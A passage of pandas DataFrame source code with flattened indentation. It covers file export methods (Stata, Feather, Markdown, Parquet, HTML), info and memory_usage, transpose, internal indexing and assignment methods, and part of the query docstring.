that all elements of `arrays` are actual arrays how they will be
stored in a block (numpy ndarray or ExtensionArray), have the same
length as and are aligned with the index, and that `columns` and
`index` are ensured to be an Index object.
Returns
-------
DataFrame
"""
if dtype is not None:
dtype = pandas_dtype(dtype)
mgr = arrays_to_mgr(
arrays,
columns,
index,
columns,
dtype=dtype,
verify_integrity=verify_integrity,
)
return cls(mgr)
@deprecate_kwarg(old_arg_name="fname", new_arg_name="path")
def to_stata(
self,
path: FilePathOrBuffer,
convert_dates: Optional[Dict[Label, str]] = None,
write_index: bool = True,
byteorder: Optional[str] = None,
time_stamp: Optional[datetime.datetime] = None,
data_label: Optional[str] = None,
variable_labels: Optional[Dict[Label, str]] = None,
version: Optional[int] = 114,
convert_strl: Optional[Sequence[Label]] = None,
compression: CompressionOptions = "infer",
storage_options: StorageOptions = None,
) -> None:
"""
Export DataFrame object to Stata dta format.
Writes the DataFrame to a Stata dataset file.
"dta" files contain a Stata dataset.
Parameters
----------
path : str, buffer or path object
String, path object (pathlib.Path or py._path.local.LocalPath) or
object implementing a binary write() function. If using a buffer
then the buffer will not be automatically closed after the file
data has been written.
.. versionchanged:: 1.0.0
Previously this was "fname"
convert_dates : dict
Dictionary mapping columns containing datetime types to stata
internal format to use when writing the dates. Options are 'tc',
'td', 'tm', 'tw', 'th', 'tq', 'ty'. Column can be either an integer
or a name. Datetime columns that do not have a conversion type
specified will be converted to 'tc'. Raises NotImplementedError if
a datetime column has timezone information.
write_index : bool
Write the index to Stata dataset.
byteorder : str
Can be ">", "<", "little", or "big". default is `sys.byteorder`.
time_stamp : datetime
A datetime to use as file creation date. Default is the current
time.
data_label : str, optional
A label for the data set. Must be 80 characters or smaller.
variable_labels : dict
Dictionary containing columns as keys and variable labels as
values. Each label must be 80 characters or smaller.
version : {114, 117, 118, 119, None}, default 114
Version to use in the output dta file. Set to None to let pandas
decide between 118 or 119 formats depending on the number of
columns in the frame. Version 114 can be read by Stata 10 and
later. Version 117 can be read by Stata 13 or later. Version 118
is supported in Stata 14 and later. Version 119 is supported in
Stata 15 and later. Version 114 limits string variables to 244
characters or fewer while versions 117 and later allow strings
with lengths up to 2,000,000 characters. Versions 118 and 119
support Unicode characters, and version 119 supports more than
32,767 variables.
.. versionchanged:: 1.0.0
Added support for formats 118 and 119.
convert_strl : list, optional
List of column names to convert to string columns to Stata StrL
format. Only available if version is 117. Storing strings in the
StrL format can produce smaller dta files if strings have more than
8 characters and values are repeated.
compression : str or dict, default 'infer'
For on-the-fly compression of the output dta. If string, specifies
compression mode. If dict, value at key 'method' specifies
compression mode. Compression mode must be one of {'infer', 'gzip',
'bz2', 'zip', 'xz', None}. If compression mode is 'infer' and
`fname` is path-like, then detect compression from the following
extensions: '.gz', '.bz2', '.zip', or '.xz' (otherwise no
compression). If dict and compression mode is one of {'zip',
'gzip', 'bz2'}, or inferred as one of the above, other entries
passed as additional compression options.
.. versionadded:: 1.1.0
storage_options : dict, optional
Extra options that make sense for a particular storage connection, e.g.
host, port, username, password, etc., if using a URL that will
be parsed by ``fsspec``, e.g., starting "s3://", "gcs://". An error
will be raised if providing this argument with a local path or
a file-like buffer. See the fsspec and backend storage implementation
docs for the set of allowed keys and values.
.. versionadded:: 1.2.0
Raises
------
NotImplementedError
* If datetimes contain timezone information
* Column dtype is not representable in Stata
ValueError
* Columns listed in convert_dates are neither datetime64[ns]
or datetime.datetime
* Column listed in convert_dates is not in DataFrame
* Categorical label contains more than 32,000 characters
See Also
--------
read_stata : Import Stata data files.
io.stata.StataWriter : Low-level writer for Stata data files.
io.stata.StataWriter117 : Low-level writer for version 117 files.
Examples
--------
>>> df = pd.DataFrame({'animal': ['falcon', 'parrot', 'falcon',
... 'parrot'],
... 'speed': [350, 18, 361, 15]})
>>> df.to_stata('animals.dta') # doctest: +SKIP
"""
if version not in (114, 117, 118, 119, None):
raise ValueError("Only formats 114, 117, 118 and 119 are supported.")
if version == 114:
if convert_strl is not None:
raise ValueError("strl is not supported in format 114")
from pandas.io.stata import StataWriter as statawriter
elif version == 117:
# mypy: Name 'statawriter' already defined (possibly by an import)
from pandas.io.stata import ( # type: ignore[no-redef]
StataWriter117 as statawriter,
)
else: # versions 118 and 119
# mypy: Name 'statawriter' already defined (possibly by an import)
from pandas.io.stata import ( # type: ignore[no-redef]
StataWriterUTF8 as statawriter,
)
kwargs: Dict[str, Any] = {}
if version is None or version >= 117:
# strl conversion is only supported >= 117
kwargs["convert_strl"] = convert_strl
if version is None or version >= 118:
# Specifying the version is only supported for UTF8 (118 or 119)
kwargs["version"] = version
# mypy: Too many arguments for "StataWriter"
writer = statawriter( # type: ignore[call-arg]
path,
self,
convert_dates=convert_dates,
byteorder=byteorder,
time_stamp=time_stamp,
data_label=data_label,
write_index=write_index,
variable_labels=variable_labels,
compression=compression,
storage_options=storage_options,
**kwargs,
)
writer.write_file()
@deprecate_kwarg(old_arg_name="fname", new_arg_name="path")
def to_feather(self, path: FilePathOrBuffer[AnyStr], **kwargs) -> None:
"""
Write a DataFrame to the binary Feather format.
Parameters
----------
path : str or file-like object
If a string, it will be used as Root Directory path.
**kwargs :
Additional keywords passed to :func:`pyarrow.feather.write_feather`.
Starting with pyarrow 0.17, this includes the `compression`,
`compression_level`, `chunksize` and `version` keywords.
.. versionadded:: 1.1.0
"""
from pandas.io.feather_format import to_feather
to_feather(self, path, **kwargs)
@doc(
Series.to_markdown,
klass=_shared_doc_kwargs["klass"],
examples="""Examples
--------
>>> df = pd.DataFrame(
... data={"animal_1": ["elk", "pig"], "animal_2": ["dog", "quetzal"]}
... )
>>> print(df.to_markdown())
| | animal_1 | animal_2 |
|---:|:-----------|:-----------|
| 0 | elk | dog |
| 1 | pig | quetzal |
Output markdown with a tabulate option.
>>> print(df.to_markdown(tablefmt="grid"))
+----+------------+------------+
| | animal_1 | animal_2 |
+====+============+============+
| 0 | elk | dog |
+----+------------+------------+
| 1 | pig | quetzal |
+----+------------+------------+
""",
)
def to_markdown(
self,
buf: Optional[Union[IO[str], str]] = None,
mode: str = "wt",
index: bool = True,
storage_options: StorageOptions = None,
**kwargs,
) -> Optional[str]:
if "showindex" in kwargs:
warnings.warn(
"'showindex' is deprecated. Only 'index' will be used "
"in a future version. Use 'index' to silence this warning.",
FutureWarning,
stacklevel=2,
)
kwargs.setdefault("headers", "keys")
kwargs.setdefault("tablefmt", "pipe")
kwargs.setdefault("showindex", index)
tabulate = import_optional_dependency("tabulate")
result = tabulate.tabulate(self, **kwargs)
if buf is None:
return result
ioargs = get_filepath_or_buffer(buf, mode=mode, storage_options=storage_options)
assert not isinstance(ioargs.filepath_or_buffer, str)
ioargs.filepath_or_buffer.writelines(result)
if ioargs.should_close:
ioargs.filepath_or_buffer.close()
return None
@deprecate_kwarg(old_arg_name="fname", new_arg_name="path")
def to_parquet(
self,
path: FilePathOrBuffer[AnyStr],
engine: str = "auto",
compression: Optional[str] = "snappy",
index: Optional[bool] = None,
partition_cols: Optional[List[str]] = None,
storage_options: StorageOptions = None,
**kwargs,
) -> None:
"""
Write a DataFrame to the binary parquet format.
This function writes the dataframe as a `parquet file
<https://parquet.apache.org/>`_. You can choose different parquet
backends, and have the option of compression. See
:ref:`the user guide <io.parquet>` for more details.
Parameters
----------
path : str or file-like object
If a string, it will be used as Root Directory path
when writing a partitioned dataset. By file-like object,
we refer to objects with a write() method, such as a file handle
(e.g. via builtin open function) or io.BytesIO. The engine
fastparquet does not accept file-like objects.
.. versionchanged:: 1.0.0
Previously this was "fname"
engine : {'auto', 'pyarrow', 'fastparquet'}, default 'auto'
Parquet library to use. If 'auto', then the option
``io.parquet.engine`` is used. The default ``io.parquet.engine``
behavior is to try 'pyarrow', falling back to 'fastparquet' if
'pyarrow' is unavailable.
compression : {'snappy', 'gzip', 'brotli', None}, default 'snappy'
Name of the compression to use. Use ``None`` for no compression.
index : bool, default None
If ``True``, include the dataframe's index(es) in the file output.
If ``False``, they will not be written to the file.
If ``None``, similar to ``True`` the dataframe's index(es)
will be saved. However, instead of being saved as values,
the RangeIndex will be stored as a range in the metadata so it
doesn't require much space and is faster. Other indexes will
be included as columns in the file output.
.. versionadded:: 0.24.0
partition_cols : list, optional, default None
Column names by which to partition the dataset.
Columns are partitioned in the order they are given.
Must be None if path is not a string.
.. versionadded:: 0.24.0
storage_options : dict, optional
Extra options that make sense for a particular storage connection, e.g.
host, port, username, password, etc., if using a URL that will
be parsed by ``fsspec``, e.g., starting "s3://", "gcs://". An error
will be raised if providing this argument with a local path or
a file-like buffer. See the fsspec and backend storage implementation
docs for the set of allowed keys and values.
.. versionadded:: 1.2.0
**kwargs
Additional arguments passed to the parquet library. See
:ref:`pandas io <io.parquet>` for more details.
See Also
--------
read_parquet : Read a parquet file.
DataFrame.to_csv : Write a csv file.
DataFrame.to_sql : Write to a sql table.
DataFrame.to_hdf : Write to hdf.
Notes
-----
This function requires either the `fastparquet
<https://pypi.org/project/fastparquet>`_ or `pyarrow
<https://arrow.apache.org/docs/python/>`_ library.
Examples
--------
>>> df = pd.DataFrame(data={'col1': [1, 2], 'col2': [3, 4]})
>>> df.to_parquet('df.parquet.gzip',
... compression='gzip') # doctest: +SKIP
>>> pd.read_parquet('df.parquet.gzip') # doctest: +SKIP
col1 col2
0 1 3
1 2 4
If you want to get a buffer to the parquet content you can use a io.BytesIO
object, as long as you don't use partition_cols, which creates multiple files.
>>> import io
>>> f = io.BytesIO()
>>> df.to_parquet(f)
>>> f.seek(0)
0
>>> content = f.read()
"""
from pandas.io.parquet import to_parquet
to_parquet(
self,
path,
engine,
compression=compression,
index=index,
partition_cols=partition_cols,
storage_options=storage_options,
**kwargs,
)
@Substitution(
header_type="bool",
header="Whether to print column labels, default True",
col_space_type="str or int, list or dict of int or str",
col_space="The minimum width of each column in CSS length "
"units. An int is assumed to be px units.\n\n"
" .. versionadded:: 0.25.0\n"
" Ability to use str",
)
@Substitution(shared_params=fmt.common_docstring, returns=fmt.return_docstring)
def to_html(
self,
buf=None,
columns=None,
col_space=None,
header=True,
index=True,
na_rep="NaN",
formatters=None,
float_format=None,
sparsify=None,
index_names=True,
justify=None,
max_rows=None,
max_cols=None,
show_dimensions=False,
decimal=".",
bold_rows=True,
classes=None,
escape=True,
notebook=False,
border=None,
table_id=None,
render_links=False,
encoding=None,
):
"""
Render a DataFrame as an HTML table.
%(shared_params)s
bold_rows : bool, default True
Make the row labels bold in the output.
classes : str or list or tuple, default None
CSS class(es) to apply to the resulting html table.
escape : bool, default True
Convert the characters <, >, and & to HTML-safe sequences.
notebook : {True, False}, default False
Whether the generated HTML is for IPython Notebook.
border : int
A ``border=border`` attribute is included in the opening
`<table>` tag. Default ``pd.options.display.html.border``.
encoding : str, default "utf-8"
Set character encoding.
.. versionadded:: 1.0
table_id : str, optional
A css id is included in the opening `<table>` tag if specified.
render_links : bool, default False
Convert URLs to HTML links.
.. versionadded:: 0.24.0
%(returns)s
See Also
--------
to_string : Convert DataFrame to a string.
"""
if justify is not None and justify not in fmt._VALID_JUSTIFY_PARAMETERS:
raise ValueError("Invalid value for justify parameter")
formatter = fmt.DataFrameFormatter(
self,
columns=columns,
col_space=col_space,
na_rep=na_rep,
formatters=formatters,
float_format=float_format,
sparsify=sparsify,
justify=justify,
index_names=index_names,
header=header,
index=index,
bold_rows=bold_rows,
escape=escape,
max_rows=max_rows,
max_cols=max_cols,
show_dimensions=show_dimensions,
decimal=decimal,
table_id=table_id,
render_links=render_links,
)
# TODO: a generic formatter wld b in DataFrameFormatter
return formatter.to_html(
buf=buf,
classes=classes,
notebook=notebook,
border=border,
encoding=encoding,
)
# ----------------------------------------------------------------------
@Substitution(
klass="DataFrame",
type_sub=" and columns",
max_cols_sub=(
"""max_cols : int, optional
When to switch from the verbose to the truncated output. If the
DataFrame has more than `max_cols` columns, the truncated output
is used. By default, the setting in
``pandas.options.display.max_info_columns`` is used.
"""
),
examples_sub=(
"""
>>> int_values = [1, 2, 3, 4, 5]
>>> text_values = ['alpha', 'beta', 'gamma', 'delta', 'epsilon']
>>> float_values = [0.0, 0.25, 0.5, 0.75, 1.0]
>>> df = pd.DataFrame({"int_col": int_values, "text_col": text_values,
... "float_col": float_values})
>>> df
int_col text_col float_col
0 1 alpha 0.00
1 2 beta 0.25
2 3 gamma 0.50
3 4 delta 0.75
4 5 epsilon 1.00
Prints information of all columns:
>>> df.info(verbose=True)
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 5 entries, 0 to 4
Data columns (total 3 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 int_col 5 non-null int64
1 text_col 5 non-null object
2 float_col 5 non-null float64
dtypes: float64(1), int64(1), object(1)
memory usage: 248.0+ bytes
Prints a summary of columns count and its dtypes but not per column
information:
>>> df.info(verbose=False)
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 5 entries, 0 to 4
Columns: 3 entries, int_col to float_col
dtypes: float64(1), int64(1), object(1)
memory usage: 248.0+ bytes
Pipe output of DataFrame.info to buffer instead of sys.stdout, get
buffer content and writes to a text file:
>>> import io
>>> buffer = io.StringIO()
>>> df.info(buf=buffer)
>>> s = buffer.getvalue()
>>> with open("df_info.txt", "w",
... encoding="utf-8") as f: # doctest: +SKIP
... f.write(s)
260
The `memory_usage` parameter allows deep introspection mode, specially
useful for big DataFrames and fine-tune memory optimization:
>>> random_strings_array = np.random.choice(['a', 'b', 'c'], 10 ** 6)
>>> df = pd.DataFrame({
... 'column_1': np.random.choice(['a', 'b', 'c'], 10 ** 6),
... 'column_2': np.random.choice(['a', 'b', 'c'], 10 ** 6),
... 'column_3': np.random.choice(['a', 'b', 'c'], 10 ** 6)
... })
>>> df.info()
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 1000000 entries, 0 to 999999
Data columns (total 3 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 column_1 1000000 non-null object
1 column_2 1000000 non-null object
2 column_3 1000000 non-null object
dtypes: object(3)
memory usage: 22.9+ MB
>>> df.info(memory_usage='deep')
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 1000000 entries, 0 to 999999
Data columns (total 3 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 column_1 1000000 non-null object
1 column_2 1000000 non-null object
2 column_3 1000000 non-null object
dtypes: object(3)
memory usage: 165.9 MB"""
),
see_also_sub=(
"""
DataFrame.describe: Generate descriptive statistics of DataFrame
columns.
DataFrame.memory_usage: Memory usage of DataFrame columns."""
),
)
@doc(DataFrameInfo.info)
def info(
self,
verbose: Optional[bool] = None,
buf: Optional[IO[str]] = None,
max_cols: Optional[int] = None,
memory_usage: Optional[Union[bool, str]] = None,
null_counts: Optional[bool] = None,
) -> None:
return DataFrameInfo(
self, verbose, buf, max_cols, memory_usage, null_counts
).info()
def memory_usage(self, index=True, deep=False) -> Series:
"""
Return the memory usage of each column in bytes.
The memory usage can optionally include the contribution of
the index and elements of `object` dtype.
This value is displayed in `DataFrame.info` by default. This can be
suppressed by setting ``pandas.options.display.memory_usage`` to False.
Parameters
----------
index : bool, default True
Specifies whether to include the memory usage of the DataFrame's
index in returned Series. If ``index=True``, the memory usage of
the index is the first item in the output.
deep : bool, default False
If True, introspect the data deeply by interrogating
`object` dtypes for system-level memory consumption, and include
it in the returned values.
Returns
-------
Series
A Series whose index is the original column names and whose values
is the memory usage of each column in bytes.
See Also
--------
numpy.ndarray.nbytes : Total bytes consumed by the elements of an
ndarray.
Series.memory_usage : Bytes consumed by a Series.
Categorical : Memory-efficient array for string values with
many repeated values.
DataFrame.info : Concise summary of a DataFrame.
Examples
--------
>>> dtypes = ['int64', 'float64', 'complex128', 'object', 'bool']
>>> data = dict([(t, np.ones(shape=5000).astype(t))
... for t in dtypes])
>>> df = pd.DataFrame(data)
>>> df.head()
int64 float64 complex128 object bool
0 1 1.0 1.000000+0.000000j 1 True
1 1 1.0 1.000000+0.000000j 1 True
2 1 1.0 1.000000+0.000000j 1 True
3 1 1.0 1.000000+0.000000j 1 True
4 1 1.0 1.000000+0.000000j 1 True
>>> df.memory_usage()
Index 128
int64 40000
float64 40000
complex128 80000
object 40000
bool 5000
dtype: int64
>>> df.memory_usage(index=False)
int64 40000
float64 40000
complex128 80000
object 40000
bool 5000
dtype: int64
The memory footprint of `object` dtype columns is ignored by default:
>>> df.memory_usage(deep=True)
Index 128
int64 40000
float64 40000
complex128 80000
object 160000
bool 5000
dtype: int64
Use a Categorical for efficient storage of an object-dtype column with
many repeated values.
>>> df['object'].astype('category').memory_usage(deep=True)
5216
"""
result = self._constructor_sliced(
[c.memory_usage(index=False, deep=deep) for col, c in self.items()],
index=self.columns,
)
if index:
result = self._constructor_sliced(
self.index.memory_usage(deep=deep), index=["Index"]
).append(result)
return result
def transpose(self, *args, copy: bool = False) -> DataFrame:
"""
Transpose index and columns.
Reflect the DataFrame over its main diagonal by writing rows as columns
and vice-versa. The property :attr:`.T` is an accessor to the method
:meth:`transpose`.
Parameters
----------
*args : tuple, optional
Accepted for compatibility with NumPy.
copy : bool, default False
Whether to copy the data after transposing, even for DataFrames
with a single dtype.
Note that a copy is always required for mixed dtype DataFrames,
or for DataFrames with any extension types.
Returns
-------
DataFrame
The transposed DataFrame.
See Also
--------
numpy.transpose : Permute the dimensions of a given array.
Notes
-----
Transposing a DataFrame with mixed dtypes will result in a homogeneous
DataFrame with the `object` dtype. In such a case, a copy of the data
is always made.
Examples
--------
**Square DataFrame with homogeneous dtype**
>>> d1 = {'col1': [1, 2], 'col2': [3, 4]}
>>> df1 = pd.DataFrame(data=d1)
>>> df1
col1 col2
0 1 3
1 2 4
>>> df1_transposed = df1.T # or df1.transpose()
>>> df1_transposed
0 1
col1 1 2
col2 3 4
When the dtype is homogeneous in the original DataFrame, we get a
transposed DataFrame with the same dtype:
>>> df1.dtypes
col1 int64
col2 int64
dtype: object
>>> df1_transposed.dtypes
0 int64
1 int64
dtype: object
**Non-square DataFrame with mixed dtypes**
>>> d2 = {'name': ['Alice', 'Bob'],
... 'score': [9.5, 8],
... 'employed': [False, True],
... 'kids': [0, 0]}
>>> df2 = pd.DataFrame(data=d2)
>>> df2
name score employed kids
0 Alice 9.5 False 0
1 Bob 8.0 True 0
>>> df2_transposed = df2.T # or df2.transpose()
>>> df2_transposed
0 1
name Alice Bob
score 9.5 8
employed False True
kids 0 0
When the DataFrame has mixed dtypes, we get a transposed DataFrame with
the `object` dtype:
>>> df2.dtypes
name object
score float64
employed bool
kids int64
dtype: object
>>> df2_transposed.dtypes
0 object
1 object
dtype: object
"""
nv.validate_transpose(args, dict())
# construct the args
dtypes = list(self.dtypes)
if self._is_homogeneous_type and dtypes and is_extension_array_dtype(dtypes[0]):
# We have EAs with the same dtype. We can preserve that dtype in transpose.
dtype = dtypes[0]
arr_type = dtype.construct_array_type()
values = self.values
new_values = [arr_type._from_sequence(row, dtype=dtype) for row in values]
result = self._constructor(
dict(zip(self.index, new_values)), index=self.columns
)
else:
new_values = self.values.T
if copy:
new_values = new_values.copy()
result = self._constructor(
new_values, index=self.columns, columns=self.index
)
return result.__finalize__(self, method="transpose")
@property
def T(self) -> DataFrame:
return self.transpose()
# ----------------------------------------------------------------------
# Indexing Methods
def _ixs(self, i: int, axis: int = 0):
"""
Parameters
----------
i : int
axis : int
Notes
-----
If slice passed, the resulting data will be a view.
"""
# irow
if axis == 0:
new_values = self._mgr.fast_xs(i)
# if we are a copy, mark as such
copy = isinstance(new_values, np.ndarray) and new_values.base is None
result = self._constructor_sliced(
new_values,
index=self.columns,
name=self.index[i],
dtype=new_values.dtype,
)
result._set_is_copy(self, copy=copy)
return result
# icol
else:
label = self.columns[i]
values = self._mgr.iget(i)
result = self._box_col_values(values, i)
# this is a cached value, mark it so
result._set_as_cached(label, self)
return result
def _get_column_array(self, i: int) -> ArrayLike:
"""
Get the values of the i'th column (ndarray or ExtensionArray, as stored
in the Block)
"""
return self._mgr.iget_values(i)
def _iter_column_arrays(self) -> Iterator[ArrayLike]:
"""
Iterate over the arrays of all columns in order.
This returns the values as stored in the Block (ndarray or ExtensionArray).
"""
for i in range(len(self.columns)):
yield self._get_column_array(i)
def __getitem__(self, key):
key = lib.item_from_zerodim(key)
key = com.apply_if_callable(key, self)
if is_hashable(key):
# shortcut if the key is in columns
if self.columns.is_unique and key in self.columns:
if self.columns.nlevels > 1:
return self._getitem_multilevel(key)
return self._get_item_cache(key)
# Do we have a slicer (on rows)?
indexer = convert_to_index_sliceable(self, key)
if indexer is not None:
# either we have a slice or we have a string that can be converted
# to a slice for partial-string date indexing
return self._slice(indexer, axis=0)
# Do we have a (boolean) DataFrame?
if isinstance(key, DataFrame):
return self.where(key)
# Do we have a (boolean) 1d indexer?
if com.is_bool_indexer(key):
return self._getitem_bool_array(key)
# We are left with two options: a single key, and a collection of keys,
# We interpret tuples as collections only for non-MultiIndex
is_single_key = isinstance(key, tuple) or not is_list_like(key)
if is_single_key:
if self.columns.nlevels > 1:
return self._getitem_multilevel(key)
indexer = self.columns.get_loc(key)
if is_integer(indexer):
indexer = [indexer]
else:
if is_iterator(key):
key = list(key)
indexer = self.loc._get_listlike_indexer(key, axis=1, raise_missing=True)[1]
# take() does not accept boolean indexers
if getattr(indexer, "dtype", None) == bool:
indexer = np.where(indexer)[0]
data = self._take_with_is_copy(indexer, axis=1)
if is_single_key:
# What does looking for a single key in a non-unique index return?
# The behavior is inconsistent. It returns a Series, except when
# - the key itself is repeated (test on data.shape, #9519), or
# - we have a MultiIndex on columns (test on self.columns, #21309)
if data.shape[1] == 1 and not isinstance(self.columns, MultiIndex):
data = data[key]
return data
def _getitem_bool_array(self, key):
# also raises Exception if object array with NA values
# warning here just in case -- previously __setitem__ was
# reindexing but __getitem__ was not; it seems more reasonable to
# go with the __setitem__ behavior since that is more consistent
# with all other indexing behavior
if isinstance(key, Series) and not key.index.equals(self.index):
warnings.warn(
"Boolean Series key will be reindexed to match DataFrame index.",
UserWarning,
stacklevel=3,
)
elif len(key) != len(self.index):
raise ValueError(
f"Item wrong length {len(key)} instead of {len(self.index)}."
)
# check_bool_indexer will throw exception if Series key cannot
# be reindexed to match DataFrame rows
key = check_bool_indexer(self.index, key)
indexer = key.nonzero()[0]
return self._take_with_is_copy(indexer, axis=0)
def _getitem_multilevel(self, key):
# self.columns is a MultiIndex
loc = self.columns.get_loc(key)
if isinstance(loc, (slice, np.ndarray)):
new_columns = self.columns[loc]
result_columns = maybe_droplevels(new_columns, key)
if self._is_mixed_type:
result = self.reindex(columns=new_columns)
result.columns = result_columns
else:
new_values = self.values[:, loc]
result = self._constructor(
new_values, index=self.index, columns=result_columns
)
result = result.__finalize__(self)
# If there is only one column being returned, and its name is
# either an empty string, or a tuple with an empty string as its
# first element, then treat the empty string as a placeholder
# and return the column as if the user had provided that empty
# string in the key. If the result is a Series, exclude the
# implied empty string from its name.
if len(result.columns) == 1:
top = result.columns[0]
if isinstance(top, tuple):
top = top[0]
if top == "":
result = result[""]
if isinstance(result, Series):
result = self._constructor_sliced(
result, index=self.index, name=key
)
result._set_is_copy(self)
return result
else:
# loc is neither a slice nor ndarray, so must be an int
return self._ixs(loc, axis=1)
def _get_value(self, index, col, takeable: bool = False):
"""
Quickly retrieve single value at passed column and index.
Parameters
----------
index : row label
col : column label
takeable : interpret the index/col as indexers, default False
Returns
-------
scalar
"""
if takeable:
series = self._ixs(col, axis=1)
return series._values[index]
series = self._get_item_cache(col)
engine = self.index._engine
try:
loc = engine.get_loc(index)
return series._values[loc]
except KeyError:
# GH 20629
if self.index.nlevels > 1:
# partial indexing forbidden
raise
# we cannot handle direct indexing
# use positional
col = self.columns.get_loc(col)
index = self.index.get_loc(index)
return self._get_value(index, col, takeable=True)
def __setitem__(self, key, value):
key = com.apply_if_callable(key, self)
# see if we can slice the rows
indexer = convert_to_index_sliceable(self, key)
if indexer is not None:
# either we have a slice or we have a string that can be converted
# to a slice for partial-string date indexing
return self._setitem_slice(indexer, value)
if isinstance(key, DataFrame) or getattr(key, "ndim", None) == 2:
self._setitem_frame(key, value)
elif isinstance(key, (Series, np.ndarray, list, Index)):
self._setitem_array(key, value)
else:
# set column
self._set_item(key, value)
def _setitem_slice(self, key: slice, value):
# NB: we can't just use self.loc[key] = value because that
# operates on labels and we need to operate positional for
# backwards-compat, xref GH#31469
self._check_setitem_copy()
self.iloc._setitem_with_indexer(key, value)
def _setitem_array(self, key, value):
# also raises Exception if object array with NA values
if com.is_bool_indexer(key):
if len(key) != len(self.index):
raise ValueError(
f"Item wrong length {len(key)} instead of {len(self.index)}!"
)
key = check_bool_indexer(self.index, key)
indexer = key.nonzero()[0]
self._check_setitem_copy()
self.iloc._setitem_with_indexer(indexer, value)
else:
if isinstance(value, DataFrame):
if len(value.columns) != len(key):
raise ValueError("Columns must be same length as key")
for k1, k2 in zip(key, value.columns):
self[k1] = value[k2]
else:
self.loc._ensure_listlike_indexer(key, axis=1)
indexer = self.loc._get_listlike_indexer(
key, axis=1, raise_missing=False
)[1]
self._check_setitem_copy()
self.iloc._setitem_with_indexer((slice(None), indexer), value)
def _setitem_frame(self, key, value):
# support boolean setting with DataFrame input, e.g.
# df[df > df2] = 0
if isinstance(key, np.ndarray):
if key.shape != self.shape:
raise ValueError("Array conditional must be same shape as self")
key = self._constructor(key, **self._construct_axes_dict())
if key.size and not is_bool_dtype(key.values):
raise TypeError(
"Must pass DataFrame or 2-d ndarray with boolean values only"
)
self._check_inplace_setting(value)
self._check_setitem_copy()
self._where(-key, value, inplace=True)
def _iset_item(self, loc: int, value):
self._ensure_valid_index(value)
# technically _sanitize_column expects a label, not a position,
# but the behavior is the same as long as we pass broadcast=False
value = self._sanitize_column(loc, value, broadcast=False)
NDFrame._iset_item(self, loc, value)
# check if we are modifying a copy
# try to set first as we want an invalid
# value exception to occur first
if len(self):
self._check_setitem_copy()
def _set_item(self, key, value):
"""
Add series to DataFrame in specified column.
If series is a numpy-array (not a Series/TimeSeries), it must be the
same length as the DataFrames index or an error will be thrown.
Series/TimeSeries will be conformed to the DataFrames index to
ensure homogeneity.
"""
self._ensure_valid_index(value)
value = self._sanitize_column(key, value)
NDFrame._set_item(self, key, value)
# check if we are modifying a copy
# try to set first as we want an invalid
# value exception to occur first
if len(self):
self._check_setitem_copy()
def _set_value(self, index, col, value, takeable: bool = False):
"""
Put single value at passed column and index.
Parameters
----------
index : row label
col : column label
value : scalar
takeable : interpret the index/col as indexers, default False
"""
try:
if takeable is True:
series = self._ixs(col, axis=1)
series._set_value(index, value, takeable=True)
return
series = self._get_item_cache(col)
engine = self.index._engine
loc = engine.get_loc(index)
validate_numeric_casting(series.dtype, value)
series._values[loc] = value
# Note: trying to use series._set_value breaks tests in
# tests.frame.indexing.test_indexing and tests.indexing.test_partial
except (KeyError, TypeError):
# set using a non-recursive method & reset the cache
if takeable:
self.iloc[index, col] = value
else:
self.loc[index, col] = value
self._item_cache.pop(col, None)
def _ensure_valid_index(self, value):
"""
Ensure that if we don't have an index, that we can create one from the
passed value.
"""
# GH5632, make sure that we are a Series convertible
if not len(self.index) and is_list_like(value) and len(value):
try:
value = Series(value)
except (ValueError, NotImplementedError, TypeError) as err:
raise ValueError(
"Cannot set a frame with no defined index "
"and a value that cannot be converted to a Series"
) from err
# GH31368 preserve name of index
index_copy = value.index.copy()
if self.index.name is not None:
index_copy.name = self.index.name
self._mgr = self._mgr.reindex_axis(index_copy, axis=1, fill_value=np.nan)
def _box_col_values(self, values, loc: int) -> Series:
"""
Provide boxed values for a column.
"""
# Lookup in columns so that if e.g. a str datetime was passed
# we attach the Timestamp object as the name.
name = self.columns[loc]
klass = self._constructor_sliced
return klass(values, index=self.index, name=name, fastpath=True)
# ----------------------------------------------------------------------
# Unsorted
def query(self, expr, inplace=False, **kwargs):
"""
Query the columns of a DataFrame with a boolean expression.
Parameters
----------
expr : str
The query string to evaluate.
You can refer to variables
in the environment by prefixing them with an '@' character like
``@a + b``.
You can refer to column names that are not valid Python variable names
by surrounding them in backticks. Thus, column names containing spaces
or punctuations (besides underscores) or starting with digits must be
surrounded by backticks. (For example, a column named "Area (cm^2) would
be referenced as `Area (cm^2)`). Column names which are Python keywords
(like "list", "for", "import", etc) cannot be used.
For example, if one of your columns is called ``a a`` and you want
to sum it with ``b``, your query should be ```a a` + b``.
.. versionadded:: 0.25.0
Backtick quoting introduced.
.. versionadded:: 1.0.0
Expanding functionality of backtick quoting for more than only spaces.
inplace : bool
Whether the query should modify the data in place or return
a modified copy.
**kwargs
See the documentation for :func:`eval` for complete details
on the keyword arguments accepted by :meth:`DataFrame.query`.
Returns
-------
DataFrame or None
DataFrame resulting from the provided query expression or
None if ``inplace=True``.
See Also
--------
eval : Evaluate a string describing operations on
DataFrame columns.
DataFrame.eval : Evaluate a string describing operations on
DataFrame columns.
Notes
-----
The result of the evaluation of this expression is first passed to
:attr:`DataFrame.loc` and if that fails because of a
multidimensional key (e.g., a DataFrame) then the result will be passed
to :meth:`DataFrame.__getitem__`.
This method uses the top-level :func:`eval` function to
evaluate the passed query.
The :meth:`~pandas.DataFrame.query` method uses a slightly
modified Python syntax by default. For example, the ``&`` and ``|``
(bitwise) operators have the precedence of their boolean cousins,
:keyword:`and` and :keyword:`or`. This *is* syntactically valid Python,
however the semantics are different.
You can change the semantics of the expression by passing the keyword
argument ``parser='python'``. This enforces the same semantics as
evaluation in Python space. Likewise, you can pass ``engine='python'``
to evaluate an expression using Python itself as a backend. This is not
recommended as it is inefficient compared to using ``numexpr`` as the
engine.
The :attr:`DataFrame.index` and
:attr:`DataFrame.columns` attributes of the
:class:`~pandas.DataFrame` instance are placed in the query namespace
by default, which allows you to treat both the index and columns of the
frame as a column in the frame.
The identifier ``index`` is used for the frame index; you can also
use the name of the index to identify it in a query. Please note that
Python keywords may not be used as identifiers.
